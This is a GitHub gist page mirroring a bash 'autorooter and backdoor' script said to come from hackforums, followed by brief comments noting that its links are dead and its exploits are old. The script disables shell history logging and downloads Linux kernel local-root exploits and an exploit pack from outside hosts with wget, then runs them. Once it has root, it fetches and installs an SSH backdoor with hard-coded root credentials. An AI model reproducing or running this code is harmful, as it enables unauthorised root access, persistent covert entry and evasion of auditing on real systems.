Created
September 1, 2016 20:44
-
-
Save grigorescu/c3519fafa258848a222acd71c6cf3a02 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # | |
| # Found on: http://hackforums.net/showthread.php?tid=914128 | |
| # | |
| #Autorooter and backdoor bash-script | |
| #Hopefully this script will come to good use | |
| #Run n tell dat home, home, homeboy!! | |
| #by: ludwig @ SSTeam.info | |
| clear | |
| #Killing logging | |
| unset HISTFILE | |
| unset SAVEFILE | |
| unset HISTSAVE | |
| history -n | |
| unset WATCH | |
| export HISTFILE=/dev/null | |
| echo "[+] Logging killed" | |
| cd /tmp | |
| rm -rf .saved | |
| mkdir .saved | |
| cd .saved | |
| echo "[+] Our directory: `pwd`" | |
| function root() | |
| { | |
| if [ `whoami` = root ]; then | |
| { | |
| echo "[+] uid=0 ;)" | |
| echo "[+] Installing backdoor" | |
| wget $backdoor 2>/dev/null | |
| tar xvf ssh.tgz >/dev/null | |
| rm -rf ssh.tgz | |
| cd .ssh | |
| chmod +x * | |
| ./setup | |
| /etc/init.d/sshd stop && /etc/init.d/sshd start #Sometimes with this backdoor init.d restart | |
| /etc/init.d/ssh stop && /etc/init.d/ssh start #Can be fucked up. | |
| echo "[+] You can now login with: root:h4ck=backd00r" | |
| exit 1 | |
| } | |
| else | |
| { | |
| echo "[-] Still `id` :(" | |
| } | |
| fi | |
| } | |
| #URLs we're going to need | |
| exploit=http://shell.jails.se/~ludde/exploit #<2.6.19-exploit | |
| exploit2=http://shell.jails.se/~ludde/enlightenment.tgz #Exploit-pack | |
| exploit4=http://data.fuskbugg.se/dipdip/gcc #<2.6.37-exploit | |
| exploit5=http://data.fuskbugg.se/dipdip/exploi #<2.6.18 exploit | |
| backdoor=http://shell.jails.se/~ludde/ssh.tgz #A backdoor | |
| function nogcc () | |
| { | |
| if [ `uname -r | sed -r 's/2.6.([0-9]+).*/\1/'` -le 19 ]; then | |
| { | |
| echo "[+] Located kernel `uname -a`" | |
| if `uname -a | grep -q 2010`; then | |
| { | |
| echo "[+] Launching exploit" | |
| wget $exploit5 2>/dev/null | |
| chmod +x exploi | |
| ./exploi | |
| root | |
| } | |
| else | |
| { | |
| echo "[+] Launching exploit" | |
| wget $exploit 2>/dev/null | |
| chmod +x exploit | |
| ./exploit | |
| root | |
| } | |
| fi | |
| if [ `uname -r | sed -r 's/2.6.([0-9]+).*/\1/'` -gt 30 ]; then | |
| { | |
| echo "[+] Kernel `uname -a` located" | |
| wget $exploit4 2>/dev/null | |
| chmod +x gcc | |
| ./gcc | |
| root | |
| } | |
| fi | |
| } | |
| fi | |
| } | |
| if [ ! /usr/bin/gcc ]; then | |
| { | |
| echo "[-] Couldn't find gcc.." | |
| echo "[-] Calling for nogcc function" | |
| sleep 1 | |
| no gcc | |
| } | |
| fi | |
| echo "[+] Other options failed. Trying enlightenment" | |
| wget $exploit2 2>/dev/null | |
| tar xvf enlightenment.tgz 2>/dev/null | |
| rm -rf enlightenment.tgz | |
| cd enlightenment | |
| ./run_null_exploits.sh << EOF | |
| 6 | |
| EOF | |
| root | |
| ./run_null_exploits.sh << EOF | |
| 5 | |
| EOF | |
| root | |
| ./run_null_exploits.sh << EOF | |
| 4 | |
| EOF | |
| root | |
| ./run_null_exploits.sh << EOF | |
| 3 | |
| EOF | |
| root | |
| ./run_null_exploits.sh << EOF | |
| 2 | |
| EOF | |
| root | |
| ./run_null_exploits.sh << EOF | |
| 0 | |
| EOF | |
| root | |
| ./run_null_exploits.sh << EOF | |
| 1 | |
| EOF | |
| root | |
| echo "[-] Script failed. :(" |
Yeah, I can't find it anymore. This was just a mirror of the script from hackforums, and as the exploits are terribly old anyway, probably best just to add this to the annals of history.
Thanks anyway!
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Backdoor link is dead.